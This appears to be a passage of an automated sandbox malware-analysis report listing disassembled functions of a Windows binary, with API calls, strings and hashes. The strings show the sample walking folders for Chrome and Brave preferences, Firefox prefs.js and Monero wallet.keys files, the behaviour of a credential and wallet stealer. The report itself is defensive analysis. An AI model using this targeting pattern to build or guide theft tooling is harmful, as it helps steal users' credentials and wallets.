                                        • API ID: Heap$Process$AllocateName$ComputerExitUser
                                        • String ID:
                                        • API String ID: 3550813701-0
                                        • Opcode ID: 20457d1c428afac1a71163914e8f06fd20d1ea3b64d304a350b466595b7c7049
                                        • Instruction ID: afb2c5956693feb705cc37ce05d9f91c2a87c2b92087105e35ad931d69de52db
                                        • Opcode Fuzzy Hash: 20457d1c428afac1a71163914e8f06fd20d1ea3b64d304a350b466595b7c7049
                                        • Instruction Fuzzy Hash: ADE012B591430657CB0073B1AC4AB6B369C9B55389F0C053DFF09F6142FA25F909E566

                                        Non-executed Functions

                                        Function 00CB38B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • wsprintfA.USER32 ref: 00CB38CC
                                        • FindFirstFileA.KERNEL32(?,?), ref: 00CB38E3
                                        • lstrcat.KERNEL32(?,?), ref: 00CB3935
                                        • StrCmpCA.SHLWAPI(?,00CC0F70), ref: 00CB3947
                                        • StrCmpCA.SHLWAPI(?,00CC0F74), ref: 00CB395D
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00CB3C67
                                        • FindClose.KERNEL32(000000FF), ref: 00CB3C7C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                        • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                        • API String ID: 1125553467-2524465048
                                        • Opcode ID: 1edee7ccaaf0f9c35ff179bdedb9de3b94c02ab27ca44810e43de36ee18a02f6
                                        • Instruction ID: 4eee8ccc6e1f21649f03888acf9f6bab10167b5982b45f15fd748a7495888126
                                        • Opcode Fuzzy Hash: 1edee7ccaaf0f9c35ff179bdedb9de3b94c02ab27ca44810e43de36ee18a02f6
                                        • Instruction Fuzzy Hash: 95A140B1A00258AFDB24DFA5DC85FEA7378BB45300F08459CF51DA6141EB75AB88CF62
                                        Function 00CABE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0E17,00000000), ref: 00CBA788
                                          • Part of subcall function 00CBA920: lstrcpy.KERNEL32(00000000,?), ref: 00CBA972
                                          • Part of subcall function 00CBA920: lstrcat.KERNEL32(00000000), ref: 00CBA982
                                          • Part of subcall function 00CBA9B0: lstrlen.KERNEL32(?,009D89A8,?,\Monero\wallet.keys,00CC0E17), ref: 00CBA9C5
                                          • Part of subcall function 00CBA9B0: lstrcpy.KERNEL32(00000000), ref: 00CBAA04
                                          • Part of subcall function 00CBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CBAA12
                                          • Part of subcall function 00CBA8A0: lstrcpy.KERNEL32(?,00CC0E17), ref: 00CBA905
                                        • FindFirstFileA.KERNEL32(00000000,?,00CC0B32,00CC0B2B,00000000,?,?,?,00CC13F4,00CC0B2A), ref: 00CABEF5
                                        • StrCmpCA.SHLWAPI(?,00CC13F8), ref: 00CABF4D
                                        • StrCmpCA.SHLWAPI(?,00CC13FC), ref: 00CABF63
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00CAC7BF
                                        • FindClose.KERNEL32(000000FF), ref: 00CAC7D1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                        • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                        • API String ID: 3334442632-726946144
                                        • Opcode ID: 8b1261dba500b06520a028ef619a6f162fb85347833915ff7a30fb929dc74b95
                                        • Instruction ID: 024c3f53a809763003baddd0b46f61885a1afcef14ed88f68237af2f7fc61781
                                        • Opcode Fuzzy Hash: 8b1261dba500b06520a028ef619a6f162fb85347833915ff7a30fb929dc74b95
                                        • Instruction Fuzzy Hash: E8425572910108ABDB14FBB0DD96EED737DAF54300F404568F94AA6181EF34AF49DBA2
                                        Function 00CB4910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • wsprintfA.USER32 ref: 00CB492C
                                        • FindFirstFileA.KERNEL32(?,?), ref: 00CB4943
                                        • StrCmpCA.SHLWAPI(?,00CC0FDC), ref: 00CB4971
                                        • StrCmpCA.SHLWAPI(?,00CC0FE0), ref: 00CB4987
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00CB4B7D
                                        • FindClose.KERNEL32(000000FF), ref: 00CB4B92
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseFirstNextwsprintf
                                        • String ID: %s\%s$%s\%s$%s\*
                                        • API String ID: 180737720-445461498
                                        • Opcode ID: 1f606b22b20f4e7602d25e3c1c69d640f1423f91a135863c9f623b5c4a17203f
                                        • Instruction ID: cadbe94404b9bead75d78ee1f977fdb4fecdbae3f86f1386aa82291b66d9fc94
                                        • Opcode Fuzzy Hash: 1f606b22b20f4e7602d25e3c1c69d640f1423f91a135863c9f623b5c4a17203f
                                        • Instruction Fuzzy Hash: 986136B1900219AFCB24EFA1DC89FEA737CBB48700F04459CF549A6141EB75AB89CF91
                                        Function 00CB4570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00CB4580
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00CB4587
                                        • wsprintfA.USER32 ref: 00CB45A6
                                        • FindFirstFileA.KERNEL32(?,?), ref: 00CB45BD
                                        • StrCmpCA.SHLWAPI(?,00CC0FC4), ref: 00CB45EB
                                        • StrCmpCA.SHLWAPI(?,00CC0FC8), ref: 00CB4601
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00CB468B
                                        • FindClose.KERNEL32(000000FF), ref: 00CB46A0
                                        • lstrcat.KERNEL32(?,009DF2C0), ref: 00CB46C5
                                        • lstrcat.KERNEL32(?,009DD880), ref: 00CB46D8
                                        • lstrlen.KERNEL32(?), ref: 00CB46E5
                                        • lstrlen.KERNEL32(?), ref: 00CB46F6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                        • String ID: %s\%s$%s\*
                                        • API String ID: 671575355-2848263008
                                        • Opcode ID: ce2b54964baeb93194550a20bf0494e7288f78ec1e0fb28145786a8b4009f626
                                        • Instruction ID: 9800ffab1e7475dd94f22c5aa7cdf81fd9c995c47907b6bf0e483cd6ced6b641
                                        • Opcode Fuzzy Hash: ce2b54964baeb93194550a20bf0494e7288f78ec1e0fb28145786a8b4009f626
                                        • Instruction Fuzzy Hash: 215146B590021C9FCB24EBB0DC89FE9777CAB54300F44459DF619A6191EB74AB88CF92
                                        Function 00CB3EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • wsprintfA.USER32 ref: 00CB3EC3
                                        • FindFirstFileA.KERNEL32(?,?), ref: 00CB3EDA
                                        • StrCmpCA.SHLWAPI(?,00CC0FAC), ref: 00CB3F08
                                        • StrCmpCA.SHLWAPI(?,00CC0FB0), ref: 00CB3F1E
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00CB406C
                                        • FindClose.KERNEL32(000000FF), ref: 00CB4081
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseFirstNextwsprintf
                                        • String ID: %s\%s
                                        • API String ID: 180737720-4073750446
                                        • Opcode ID: 7affd94b2ea6ac24268a25efaa65319600b6665a0c8632a5d4993b18f692b2be
                                        • Instruction ID: 8fe0c1439db8ed198870def2eaae4282be8cbddcda29fd4db4438aab048248d7
                                        • Opcode Fuzzy Hash: 7affd94b2ea6ac24268a25efaa65319600b6665a0c8632a5d4993b18f692b2be
                                        • Instruction Fuzzy Hash: B15155B6900218AFCB24EBB0DC86EFA737CBB44300F04459DB659A6040DB75EB89CF95
                                        Function 00CAED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • wsprintfA.USER32 ref: 00CAED3E
                                        • FindFirstFileA.KERNEL32(?,?), ref: 00CAED55
                                        • StrCmpCA.SHLWAPI(?,00CC1538), ref: 00CAEDAB
                                        • StrCmpCA.SHLWAPI(?,00CC153C), ref: 00CAEDC1
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00CAF2AE
                                        • FindClose.KERNEL32(000000FF), ref: 00CAF2C3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseFirstNextwsprintf
                                        • String ID: %s\*.*
                                        • API String ID: 180737720-1013718255
                                        • Opcode ID: ff6ef51b79d2ab0244b0285ef3104e46b4927afba5f96896847570e590d1bc3d
                                        • Instruction ID: f92b731cd0e23a6617d3ec42b7d2a62381d5afdf2a95f29ad34d2c58b7d0d697
                                        • Opcode Fuzzy Hash: ff6ef51b79d2ab0244b0285ef3104e46b4927afba5f96896847570e590d1bc3d
                                        • Instruction Fuzzy Hash: C6E1F771911118AAEB64FB61DC92FEE733CAF54300F4041E9B54A62492EF316F8AEF51
                                        Function 00CAF6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0E17,00000000), ref: 00CBA788
                                          • Part of subcall function 00CBA920: lstrcpy.KERNEL32(00000000,?), ref: 00CBA972
                                          • Part of subcall function 00CBA920: lstrcat.KERNEL32(00000000), ref: 00CBA982
                                          • Part of subcall function 00CBA9B0: lstrlen.KERNEL32(?,009D89A8,?,\Monero\wallet.keys,00CC0E17), ref: 00CBA9C5
                                          • Part of subcall function 00CBA9B0: lstrcpy.KERNEL32(00000000), ref: 00CBAA04
                                          • Part of subcall function 00CBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CBAA12
                                          • Part of subcall function 00CBA8A0: lstrcpy.KERNEL32(?,00CC0E17), ref: 00CBA905
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00CC15B8,00CC0D96), ref: 00CAF71E
                                        • StrCmpCA.SHLWAPI(?,00CC15BC), ref: 00CAF76F
                                        • StrCmpCA.SHLWAPI(?,00CC15C0), ref: 00CAF785
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00CAFAB1
                                        • FindClose.KERNEL32(000000FF), ref: 00CAFAC3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                        • String ID: prefs.js
                                        • API String ID: 3334442632-3783873740
                                        • Opcode ID: 34f8cd16304287fb10f4d08c5336b01a2fc6dcfe5288b991f1ac306869d49c6f
                                        • Instruction ID: 451e42f2764b8bbe597a9bf9edbbaa762ddaadca8f2e54f57a4f3aa013ef99fd
                                        • Opcode Fuzzy Hash: 34f8cd16304287fb10f4d08c5336b01a2fc6dcfe5288b991f1ac306869d49c6f
                                        • Instruction Fuzzy Hash: 70B14271900118ABDB24FF61DC96FEE7379AF55300F4081A8E44AA7191EF316B4ADF92
                                        Function 00CA16D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0E17,00000000), ref: 00CBA788
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00CC510C,?,?,?,00CC51B4,?,?,00000000,?,00000000), ref: 00CA1923
                                        • StrCmpCA.SHLWAPI(?,00CC525C), ref: 00CA1973
                                        • StrCmpCA.SHLWAPI(?,00CC5304), ref: 00CA1989
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00CA1D40
                                        • DeleteFileA.KERNEL32(00000000), ref: 00CA1DCA
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00CA1E20
                                        • FindClose.KERNEL32(000000FF), ref: 00CA1E32
                                          • Part of subcall function 00CBA920: lstrcpy.KERNEL32(00000000,?), ref: 00CBA972
                                          • Part of subcall function 00CBA920: lstrcat.KERNEL32(00000000), ref: 00CBA982
                                          • Part of subcall function 00CBA9B0: lstrlen.KERNEL32(?,009D89A8,?,\Monero\wallet.keys,00CC0E17), ref: 00CBA9C5
                                          • Part of subcall function 00CBA9B0: lstrcpy.KERNEL32(00000000), ref: 00CBAA04
                                          • Part of subcall function 00CBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CBAA12
                                          • Part of subcall function 00CBA8A0: lstrcpy.KERNEL32(?,00CC0E17), ref: 00CBA905
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                        • String ID: \*.*
                                        • API String ID: 1415058207-1173974218
                                        • Opcode ID: dda21f60d416a766c102de3e7d4ff853206a741eb42b482bc70a1c846bdd1a43
                                        • Instruction ID: ee8d7627231faf0313a450f81e74b826b4fdcede22142a6ab1e1ace2f6fec9dd
                                        • Opcode Fuzzy Hash: dda21f60d416a766c102de3e7d4ff853206a741eb42b482bc70a1c846bdd1a43
                                        • Instruction Fuzzy Hash: DF12F271910118ABDB25FB60CCA6EEE737CAF54300F4041A9B54A664D1EF316F89EFA1
                                        Function 00CADE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0E17,00000000), ref: 00CBA788
                                          • Part of subcall function 00CBA9B0: lstrlen.KERNEL32(?,009D89A8,?,\Monero\wallet.keys,00CC0E17), ref: 00CBA9C5
                                          • Part of subcall function 00CBA9B0: lstrcpy.KERNEL32(00000000), ref: 00CBAA04
                                          • Part of subcall function 00CBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CBAA12
                                          • Part of subcall function 00CBA8A0: lstrcpy.KERNEL32(?,00CC0E17), ref: 00CBA905
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00CC0C2E), ref: 00CADE5E
                                        • StrCmpCA.SHLWAPI(?,00CC14C8), ref: 00CADEAE
                                        • StrCmpCA.SHLWAPI(?,00CC14CC), ref: 00CADEC4
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00CAE3E0
                                        • FindClose.KERNEL32(000000FF), ref: 00CAE3F2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
